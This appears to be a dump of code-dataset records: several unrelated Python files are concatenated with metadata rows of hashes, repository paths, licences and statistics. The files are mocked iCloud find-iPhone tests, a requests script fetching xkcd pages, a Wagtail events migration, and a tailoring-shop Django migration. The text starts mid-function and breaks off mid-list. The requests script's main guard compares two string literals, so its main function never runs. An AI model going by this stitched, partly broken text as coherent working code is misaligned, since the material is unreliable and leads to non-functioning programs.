m_pc_service.return_value.devices = [m_device]
# run the func
find_iphone(m_text)
# testing.
m_pc_service.assert_called_once_with(M_USERNAME, M_PASSWORD)
m_tts.assert_called_once_with(
'Sending ring command to the phone now')
m_device.status.assert_called_once_with()
m_device.play_sound.assert_called_once_with()
def test_find_iphone_with_2_phones(self):
"""test find_iphone func."""
m_text = mock.Mock()
m_device1 = mock.Mock()
m_device1.status.return_value = {'deviceDisplayName': 'iPhone'}
m_device2 = mock.Mock()
m_device2.status.return_value = {'deviceDisplayName': 'iPhone'}
from melissa.actions.find_iphone import find_iphone
with mock.patch('melissa.actions.find_iphone.PyiCloudService') \
as m_pc_service, \
mock.patch('melissa.actions.find_iphone.tts') as m_tts:
m_pc_service.return_value.devices = [m_device1, m_device2]
# run the func
find_iphone(m_text)
# testing.
m_pc_service.assert_called_once_with(M_USERNAME, M_PASSWORD)
m_tts.assert_called_with(
'Sending ring command to the phone now')
m_device1.status.assert_called_once_with()
m_device1.play_sound.assert_called_once_with()
m_device2.status.assert_called_once_with()
m_device2.play_sound.assert_called_once_with()
def test_find_iphone_raise_failed_login(self):
"""test find iphone but raise failed login error."""
m_text = mock.Mock()
from melissa.actions.find_iphone import find_iphone
with mock.patch('melissa.actions.find_iphone.PyiCloudService') \
as m_pc_service, \
mock.patch('melissa.actions.find_iphone.tts') as m_tts:
m_pc_service.side_effect = PyiCloudFailedLoginException()
# run
find_iphone(m_text)
# testing
m_pc_service.assert_called_once_with(M_USERNAME, M_PASSWORD)
m_tts.assert_called_once_with('Invalid Username & Password')
def test_iphone_battery_raise_failed_login(self):
"""test find iphone but raise failed login error."""
m_text = mock.Mock()
from melissa.actions.find_iphone import iphone_battery
with mock.patch('melissa.actions.find_iphone.PyiCloudService') \
as m_pc_service, \
mock.patch('melissa.actions.find_iphone.tts') as m_tts:
m_pc_service.side_effect = PyiCloudFailedLoginException()
# run
iphone_battery(m_text)
# testing
m_pc_service.assert_called_once_with(M_USERNAME, M_PASSWORD)
m_tts.assert_called_once_with('Invalid Username & Password')
def test_iphone_battery_with_a_phone(self):
"""test find_iphone func."""
m_text = mock.Mock()
m_device = mock.Mock()
m_battery_level = 0.5
expected_percentage = int(float(m_battery_level) * 100)
m_tts_expected_arg = '{}percent battery left in m_name'.format(
expected_percentage)
m_device_name = 'm_name'
m_device.status.return_value = {
'deviceDisplayName': 'iPhone',
'batteryLevel': m_battery_level,
'name': m_device_name,
}
from melissa.actions.find_iphone import iphone_battery
with mock.patch('melissa.actions.find_iphone.PyiCloudService') \
as m_pc_service, \
mock.patch('melissa.actions.find_iphone.tts') as m_tts:
m_pc_service.return_value.devices = [m_device]
# run the func
iphone_battery(m_text)
# testing.
m_pc_service.assert_called_once_with(M_USERNAME, M_PASSWORD)
m_tts.assert_called_once_with(m_tts_expected_arg)
assert m_device.status.call_count == 2
m_device.status.assert_called_with()
| 42.031847 | 77 | 0.642522 | 823 | 6,599 | 4.81288 | 0.132442 | 0.118657 | 0.086342 | 0.115122 | 0.838677 | 0.80409 | 0.763949 | 0.746024 | 0.746024 | 0.703105 | 0 | 0.003958 | 0.272466 | 6,599 | 156 | 78 | 42.301282 | 0.821079 | 0.098348 | 0 | 0.572727 | 0 | 0 | 0.163555 | 0.094708 | 0 | 0 | 0 | 0 | 0.2 | 1 | 0.063636 | false | 0.109091 | 0.118182 | 0 | 0.190909 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
94199ba89ec1ad661777b664016bc5e6b33877a2 | 539 | py | Python | requests_examples/basic_example.py | MKaczkow/python_concepts | 2afd1782b75003bbb9474edf2fb0d0f86b024ce0 | [
"MIT"
] | null | null | null | requests_examples/basic_example.py | MKaczkow/python_concepts | 2afd1782b75003bbb9474edf2fb0d0f86b024ce0 | [
"MIT"
] | null | null | null | requests_examples/basic_example.py | MKaczkow/python_concepts | 2afd1782b75003bbb9474edf2fb0d0f86b024ce0 | [
"MIT"
] | null | null | null | import requests as req
def main():
# basic GET request and response
r = req.get('https://xkcd.com/353/')
# print(r.text)
print(r.url)
# print(r.encoding)
# print(r.content)
# print(r.json())
print(r.raw)
print(r.raw.read(10))
# basic GET request and response
r = req.get('https://xkcd.com/327/')
# print(r.text)
print(r.url)
# print(r.encoding)
# print(r.content)
# print(r.json())
print(r.raw)
print(r.raw.read(10))
if "__name__" == "__main__":
main()
| 16.333333 | 40 | 0.564007 | 80 | 539 | 3.7 | 0.35 | 0.283784 | 0.121622 | 0.121622 | 0.844595 | 0.844595 | 0.844595 | 0.844595 | 0.844595 | 0.844595 | 0 | 0.024876 | 0.254174 | 539 | 32 | 41 | 16.84375 | 0.711443 | 0.35436 | 0 | 0.5 | 0 | 0 | 0.172107 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.083333 | 0 | 0.166667 | 0.5 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 8 |
94778ba200a4d95ad10296b130ebfeba39aece23 | 19,568 | py | Python | iati/events/migrations/0001_initial.py | andylolz/IATI-Standard-Website | b781b9fe6b6430f93826e530e9560183bf8fd310 | [
"MIT"
] | 4 | 2019-03-28T06:42:17.000Z | 2021-06-06T13:10:51.000Z | iati/events/migrations/0001_initial.py | andylolz/IATI-Standard-Website | b781b9fe6b6430f93826e530e9560183bf8fd310 | [
"MIT"
] | 177 | 2018-09-28T14:21:56.000Z | 2022-03-30T21:45:26.000Z | iati/events/migrations/0001_initial.py | andylolz/IATI-Standard-Website | b781b9fe6b6430f93826e530e9560183bf8fd310 | [
"MIT"
] | 8 | 2018-10-25T20:43:10.000Z | 2022-03-17T14:19:27.000Z | # Generated by Django 2.0.5 on 2018-06-13 18:26
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import home.models
import modelcluster.fields
import wagtail.core.blocks
import wagtail.core.fields
import wagtail.documents.blocks
import wagtail.images.blocks
class Migration(migrations.Migration):
initial = True
dependencies = [
('wagtailcore', '0040_page_draft_title'),
('wagtailimages', '0019_delete_filter'),
]
operations = [
migrations.CreateModel(
name='EventIndexPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('heading', models.CharField(blank=True, max_length=255, null=True)),
('heading_en', models.CharField(blank=True, max_length=255, null=True)),
('heading_fr', models.CharField(blank=True, max_length=255, null=True)),
('heading_es', models.CharField(blank=True, max_length=255, null=True)),
('heading_pt', models.CharField(blank=True, max_length=255, null=True)),
('excerpt', models.TextField(blank=True, null=True)),
('excerpt_en', models.TextField(blank=True, null=True)),
('excerpt_fr', models.TextField(blank=True, null=True)),
('excerpt_es', models.TextField(blank=True, null=True)),
('excerpt_pt', models.TextField(blank=True, null=True)),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='EventPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('heading', models.CharField(blank=True, max_length=255, null=True)),
('heading_en', models.CharField(blank=True, max_length=255, null=True)),
('heading_fr', models.CharField(blank=True, max_length=255, null=True)),
('heading_es', models.CharField(blank=True, max_length=255, null=True)),
('heading_pt', models.CharField(blank=True, max_length=255, null=True)),
('excerpt', models.TextField(blank=True, null=True)),
('excerpt_en', models.TextField(blank=True, null=True)),
('excerpt_fr', models.TextField(blank=True, null=True)),
('excerpt_es', models.TextField(blank=True, null=True)),
('excerpt_pt', models.TextField(blank=True, null=True)),
('content_editor', wagtail.core.fields.StreamField((('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('image_figure', wagtail.core.blocks.StructBlock((('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', home.models.ImageAlignmentChoiceBlock()), ('caption', wagtail.core.blocks.RichTextBlock(required=False))), icon='image', label='Image figure')), ('pullquote', wagtail.core.blocks.StructBlock((('quote', wagtail.core.blocks.TextBlock('quote title')),))), ('aligned_html', wagtail.core.blocks.StructBlock((('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', home.models.HTMLAlignmentChoiceBlock())), icon='code', label='Raw HTML')), ('document_box', wagtail.core.blocks.StreamBlock((('document_box_heading', wagtail.core.blocks.CharBlock(classname='title', help_text='Only one heading per box.', icon='title', required=False)), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse', required=False))), icon='doc-full-inverse')), ('anchor_point', wagtail.core.blocks.CharBlock(help_text='Custom anchor points are expected to precede other content.', icon='order-down'))), blank=True, null=True)),
('content_editor_en', wagtail.core.fields.StreamField((('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('image_figure', wagtail.core.blocks.StructBlock((('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', home.models.ImageAlignmentChoiceBlock()), ('caption', wagtail.core.blocks.RichTextBlock(required=False))), icon='image', label='Image figure')), ('pullquote', wagtail.core.blocks.StructBlock((('quote', wagtail.core.blocks.TextBlock('quote title')),))), ('aligned_html', wagtail.core.blocks.StructBlock((('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', home.models.HTMLAlignmentChoiceBlock())), icon='code', label='Raw HTML')), ('document_box', wagtail.core.blocks.StreamBlock((('document_box_heading', wagtail.core.blocks.CharBlock(classname='title', help_text='Only one heading per box.', icon='title', required=False)), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse', required=False))), icon='doc-full-inverse')), ('anchor_point', wagtail.core.blocks.CharBlock(help_text='Custom anchor points are expected to precede other content.', icon='order-down'))), blank=True, null=True)),
('content_editor_fr', wagtail.core.fields.StreamField((('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('image_figure', wagtail.core.blocks.StructBlock((('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', home.models.ImageAlignmentChoiceBlock()), ('caption', wagtail.core.blocks.RichTextBlock(required=False))), icon='image', label='Image figure')), ('pullquote', wagtail.core.blocks.StructBlock((('quote', wagtail.core.blocks.TextBlock('quote title')),))), ('aligned_html', wagtail.core.blocks.StructBlock((('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', home.models.HTMLAlignmentChoiceBlock())), icon='code', label='Raw HTML')), ('document_box', wagtail.core.blocks.StreamBlock((('document_box_heading', wagtail.core.blocks.CharBlock(classname='title', help_text='Only one heading per box.', icon='title', required=False)), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse', required=False))), icon='doc-full-inverse')), ('anchor_point', wagtail.core.blocks.CharBlock(help_text='Custom anchor points are expected to precede other content.', icon='order-down'))), blank=True, null=True)),
('content_editor_es', wagtail.core.fields.StreamField((('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('image_figure', wagtail.core.blocks.StructBlock((('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', home.models.ImageAlignmentChoiceBlock()), ('caption', wagtail.core.blocks.RichTextBlock(required=False))), icon='image', label='Image figure')), ('pullquote', wagtail.core.blocks.StructBlock((('quote', wagtail.core.blocks.TextBlock('quote title')),))), ('aligned_html', wagtail.core.blocks.StructBlock((('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', home.models.HTMLAlignmentChoiceBlock())), icon='code', label='Raw HTML')), ('document_box', wagtail.core.blocks.StreamBlock((('document_box_heading', wagtail.core.blocks.CharBlock(classname='title', help_text='Only one heading per box.', icon='title', required=False)), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse', required=False))), icon='doc-full-inverse')), ('anchor_point', wagtail.core.blocks.CharBlock(help_text='Custom anchor points are expected to precede other content.', icon='order-down'))), blank=True, null=True)),
('content_editor_pt', wagtail.core.fields.StreamField((('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('image_figure', wagtail.core.blocks.StructBlock((('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', home.models.ImageAlignmentChoiceBlock()), ('caption', wagtail.core.blocks.RichTextBlock(required=False))), icon='image', label='Image figure')), ('pullquote', wagtail.core.blocks.StructBlock((('quote', wagtail.core.blocks.TextBlock('quote title')),))), ('aligned_html', wagtail.core.blocks.StructBlock((('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', home.models.HTMLAlignmentChoiceBlock())), icon='code', label='Raw HTML')), ('document_box', wagtail.core.blocks.StreamBlock((('document_box_heading', wagtail.core.blocks.CharBlock(classname='title', help_text='Only one heading per box.', icon='title', required=False)), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse', required=False))), icon='doc-full-inverse')), ('anchor_point', wagtail.core.blocks.CharBlock(help_text='Custom anchor points are expected to precede other content.', icon='order-down'))), blank=True, null=True)),
('date_start', models.DateTimeField(default=django.utils.timezone.now, verbose_name='Event start date and time')),
('date_end', models.DateTimeField(blank=True, null=True, verbose_name='Event end date and time')),
('location', models.TextField(blank=True, null=True)),
('registration_link', models.URLField(blank=True, max_length=255, null=True)),
('additional_information', wagtail.core.fields.StreamField((('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('image_figure', wagtail.core.blocks.StructBlock((('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', home.models.ImageAlignmentChoiceBlock()), ('caption', wagtail.core.blocks.RichTextBlock(required=False))), icon='image', label='Image figure')), ('pullquote', wagtail.core.blocks.StructBlock((('quote', wagtail.core.blocks.TextBlock('quote title')),))), ('aligned_html', wagtail.core.blocks.StructBlock((('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', home.models.HTMLAlignmentChoiceBlock())), icon='code', label='Raw HTML')), ('document_box', wagtail.core.blocks.StreamBlock((('document_box_heading', wagtail.core.blocks.CharBlock(classname='title', help_text='Only one heading per box.', icon='title', required=False)), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse', required=False))), icon='doc-full-inverse')), ('anchor_point', wagtail.core.blocks.CharBlock(help_text='Custom anchor points are expected to precede other content.', icon='order-down'))), blank=True, null=True)),
('additional_information_en', wagtail.core.fields.StreamField((('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('image_figure', wagtail.core.blocks.StructBlock((('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', home.models.ImageAlignmentChoiceBlock()), ('caption', wagtail.core.blocks.RichTextBlock(required=False))), icon='image', label='Image figure')), ('pullquote', wagtail.core.blocks.StructBlock((('quote', wagtail.core.blocks.TextBlock('quote title')),))), ('aligned_html', wagtail.core.blocks.StructBlock((('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', home.models.HTMLAlignmentChoiceBlock())), icon='code', label='Raw HTML')), ('document_box', wagtail.core.blocks.StreamBlock((('document_box_heading', wagtail.core.blocks.CharBlock(classname='title', help_text='Only one heading per box.', icon='title', required=False)), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse', required=False))), icon='doc-full-inverse')), ('anchor_point', wagtail.core.blocks.CharBlock(help_text='Custom anchor points are expected to precede other content.', icon='order-down'))), blank=True, null=True)),
('additional_information_fr', wagtail.core.fields.StreamField((('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('image_figure', wagtail.core.blocks.StructBlock((('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', home.models.ImageAlignmentChoiceBlock()), ('caption', wagtail.core.blocks.RichTextBlock(required=False))), icon='image', label='Image figure')), ('pullquote', wagtail.core.blocks.StructBlock((('quote', wagtail.core.blocks.TextBlock('quote title')),))), ('aligned_html', wagtail.core.blocks.StructBlock((('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', home.models.HTMLAlignmentChoiceBlock())), icon='code', label='Raw HTML')), ('document_box', wagtail.core.blocks.StreamBlock((('document_box_heading', wagtail.core.blocks.CharBlock(classname='title', help_text='Only one heading per box.', icon='title', required=False)), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse', required=False))), icon='doc-full-inverse')), ('anchor_point', wagtail.core.blocks.CharBlock(help_text='Custom anchor points are expected to precede other content.', icon='order-down'))), blank=True, null=True)),
('additional_information_es', wagtail.core.fields.StreamField((('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('image_figure', wagtail.core.blocks.StructBlock((('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', home.models.ImageAlignmentChoiceBlock()), ('caption', wagtail.core.blocks.RichTextBlock(required=False))), icon='image', label='Image figure')), ('pullquote', wagtail.core.blocks.StructBlock((('quote', wagtail.core.blocks.TextBlock('quote title')),))), ('aligned_html', wagtail.core.blocks.StructBlock((('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', home.models.HTMLAlignmentChoiceBlock())), icon='code', label='Raw HTML')), ('document_box', wagtail.core.blocks.StreamBlock((('document_box_heading', wagtail.core.blocks.CharBlock(classname='title', help_text='Only one heading per box.', icon='title', required=False)), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse', required=False))), icon='doc-full-inverse')), ('anchor_point', wagtail.core.blocks.CharBlock(help_text='Custom anchor points are expected to precede other content.', icon='order-down'))), blank=True, null=True)),
('additional_information_pt', wagtail.core.fields.StreamField((('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('image_figure', wagtail.core.blocks.StructBlock((('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', home.models.ImageAlignmentChoiceBlock()), ('caption', wagtail.core.blocks.RichTextBlock(required=False))), icon='image', label='Image figure')), ('pullquote', wagtail.core.blocks.StructBlock((('quote', wagtail.core.blocks.TextBlock('quote title')),))), ('aligned_html', wagtail.core.blocks.StructBlock((('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', home.models.HTMLAlignmentChoiceBlock())), icon='code', label='Raw HTML')), ('document_box', wagtail.core.blocks.StreamBlock((('document_box_heading', wagtail.core.blocks.CharBlock(classname='title', help_text='Only one heading per box.', icon='title', required=False)), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse', required=False))), icon='doc-full-inverse')), ('anchor_point', wagtail.core.blocks.CharBlock(help_text='Custom anchor points are expected to precede other content.', icon='order-down'))), blank=True, null=True)),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='EventType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255, unique=True)),
('name_en', models.CharField(max_length=255, null=True, unique=True)),
('name_fr', models.CharField(max_length=255, null=True, unique=True)),
('name_es', models.CharField(max_length=255, null=True, unique=True)),
('name_pt', models.CharField(max_length=255, null=True, unique=True)),
('slug', models.SlugField(unique=True)),
],
),
migrations.CreateModel(
name='FeaturedEvent',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('event', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='+', to='events.EventPage')),
],
),
migrations.AddField(
model_name='eventpage',
name='event_type',
field=modelcluster.fields.ParentalManyToManyField(blank=True, to='events.EventType'),
),
migrations.AddField(
model_name='eventpage',
name='feed_image',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image'),
),
]
| 181.185185 | 1,470 | 0.707124 | 2,246 | 19,568 | 6.085485 | 0.071238 | 0.12233 | 0.175373 | 0.095113 | 0.929324 | 0.927349 | 0.918203 | 0.910887 | 0.910887 | 0.907594 | 0 | 0.005762 | 0.104252 | 19,568 | 107 | 1,471 | 182.878505 | 0.774019 | 0.0023 | 0 | 0.52 | 1 | 0 | 0.22883 | 0.007325 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.09 | 0 | 0.13 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
9480322ea07ec3fe618435425b331accd502962b | 67,783 | py | Python | wap/migrations/0001_initial.py | LandyGuo/brosbespoke | 642fda249d01ed30b7e3b711f1521f22e88312bb | [
"Apache-2.0"
] | 1 | 2016-03-31T03:22:47.000Z | 2016-03-31T03:22:47.000Z | wap/migrations/0001_initial.py | LandyGuo/brosbespoke | 642fda249d01ed30b7e3b711f1521f22e88312bb | [
"Apache-2.0"
] | null | null | null | wap/migrations/0001_initial.py | LandyGuo/brosbespoke | 642fda249d01ed30b7e3b711f1521f22e88312bb | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import wap.models
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Address4Order',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('recipient', models.CharField(max_length=128, null=True, verbose_name=b'\xe6\x94\xb6\xe4\xbb\xb6\xe4\xba\xba', blank=True)),
('phone', models.CharField(default=b'', max_length=16, null=True, verbose_name=b'\xe6\x94\xb6\xe4\xbb\xb6\xe4\xba\xba\xe7\x94\xb5\xe8\xaf\x9d', blank=True)),
('address_region', models.CharField(default=b'', max_length=64, null=True, verbose_name=b'\xe6\x89\x80\xe5\x9c\xa8\xe5\xb8\x82\xe5\x8c\xba', blank=True)),
('address_street', models.CharField(default=b'', max_length=128, null=True, verbose_name=b'\xe8\xa1\x97\xe9\x81\x93\xe8\xaf\xa6\xe7\xbb\x86\xe5\x9c\xb0\xe5\x9d\x80', blank=True)),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name=b'\xe5\x88\x9b\xe5\xbb\xba\xe6\x97\xb6\xe9\x97\xb4')),
],
options={
'verbose_name': '\u7528\u6237\u5e38\u7528\u8ba2\u5355\u5730\u5740',
'verbose_name_plural': '\u7528\u6237\u5e38\u7528\u8ba2\u5355\u5730\u5740',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Banner',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(default=b'', max_length=256, verbose_name=b'\xe5\x90\x8d\xe7\xa7\xb0')),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name=b'\xe5\x88\x9b\xe5\xbb\xba\xe6\x97\xb6\xe9\x97\xb4')),
('img', models.ImageField(upload_to=wap.models.get_uploadto_path, null=True, verbose_name=b'\xe5\xb1\x95\xe7\xa4\xba\xe5\x9b\xbe', blank=True)),
('type', models.CharField(default=b'', max_length=10, null=True, verbose_name=b'\xe5\xb1\x95\xe7\xa4\xba\xe5\x9b\xbe\xe7\xb1\xbb\xe5\x9e\x8b', blank=True)),
('img_href', models.CharField(default=b'', max_length=256, null=True, verbose_name=b'\xe5\xa4\x96\xe9\x83\xa8\xe8\xb6\x85\xe9\x93\xbe\xe6\x8e\xa5', blank=True)),
],
options={
'verbose_name': '\u5c55\u793a\u56fe',
'verbose_name_plural': '\u5c55\u793a\u56fe',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Cart',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('price', models.FloatField(default=0, null=True, verbose_name=b'\xe4\xbb\xb7\xe6\xa0\xbc', blank=True)),
('is4friend', models.BooleanField(default=False, verbose_name=b'\xe6\x98\xaf\xe5\x90\xa6\xe4\xb8\xba\xe9\x87\x8d\xe8\xa7\x86\xe7\x9a\x84\xe4\xba\xba\xe5\xae\x9a\xe5\x88\xb6')),
('friend_phone', models.CharField(default=b'', max_length=16, null=True, verbose_name=b'\xe6\x9c\x8b\xe5\x8f\x8b\xe7\x94\xb5\xe8\xaf\x9d', blank=True)),
('create_time', models.DateTimeField(auto_now=True, verbose_name=b'\xe5\x88\x9b\xe5\xbb\xba\xe6\x97\xb6\xe9\x97\xb4')),
('kouxing_sy', models.CharField(default=b'', choices=[(b'1', b'1'), (b'2', b'2'), (b'3', b'3'), (b'2*1', b'2*1'), (b'4*2', b'4*2'), (b'6*2', b'6*2')], max_length=16, blank=True, null=True, verbose_name=b'\xe6\x89\xa3\xe5\x9e\x8b\xef\xbc\x88\xe4\xb8\x8a\xe8\xa1\xa3\xef\xbc\x89')),
('lingxing_sy', models.CharField(default=b'', choices=[(b'\xe5\xb9\xb3\xe9\xa9\xb3\xe5\xa4\xb4', b'\xe5\xb9\xb3\xe9\xa9\xb3\xe5\xa4\xb4'), (b'\xe6\x9e\xaa\xe9\xa9\xb3\xe5\xa4\xb4', b'\xe6\x9e\xaa\xe9\xa9\xb3\xe5\xa4\xb4'), (b'\xe7\xa4\xbc\xe6\x9c\x8d\xe9\xa2\x86', b'\xe7\xa4\xbc\xe6\x9c\x8d\xe9\xa2\x86')], max_length=16, blank=True, null=True, verbose_name=b'\xe9\xa2\x86\xe5\x9e\x8b\xef\xbc\x88\xe4\xb8\x8a\xe8\xa1\xa3\xef\xbc\x89')),
('yaodou_sy', models.CharField(default=b'', choices=[(b'\xe6\x99\xae\xe9\x80\x9a', b'\xe6\x99\xae\xe9\x80\x9a'), (b'\xe6\x96\x9c\xe5\x85\x9c', b'\xe6\x96\x9c\xe5\x85\x9c'), (b'\xe5\x8f\x8c\xe7\x89\x99\xe5\x85\x9c', b'\xe5\x8f\x8c\xe7\x89\x99\xe5\x85\x9c')], max_length=16, blank=True, null=True, verbose_name=b'\xe8\x85\xb0\xe5\x85\x9c\xef\xbc\x88\xe4\xb8\x8a\xe8\xa1\xa3\xef\xbc\x89')),
('kaiqi_sy', models.CharField(default=b'', choices=[(b'\xe5\x90\x8e\xe5\xbc\x80\xe6\xb0\x94', b'\xe5\x90\x8e\xe5\xbc\x80\xe6\xb0\x94'), (b'\xe4\xbe\xa7\xe5\xbc\x80\xe6\xb0\x94', b'\xe4\xbe\xa7\xe5\xbc\x80\xe6\xb0\x94'), (b'\xe6\x97\xa0', b'\xe6\x97\xa0')], max_length=16, blank=True, null=True, verbose_name=b'\xe5\xbc\x80\xe6\xb0\x94\xef\xbc\x88\xe4\xb8\x8a\xe8\xa1\xa3\xef\xbc\x89')),
('xiukou_sy', models.CharField(default=b'', choices=[(b'3', b'3'), (b'4', b'4')], max_length=16, blank=True, null=True, verbose_name=b'\xe8\xa2\x96\xe6\x89\xa3\xef\xbc\x88\xe4\xb8\x8a\xe8\xa1\xa3\xef\xbc\x89')),
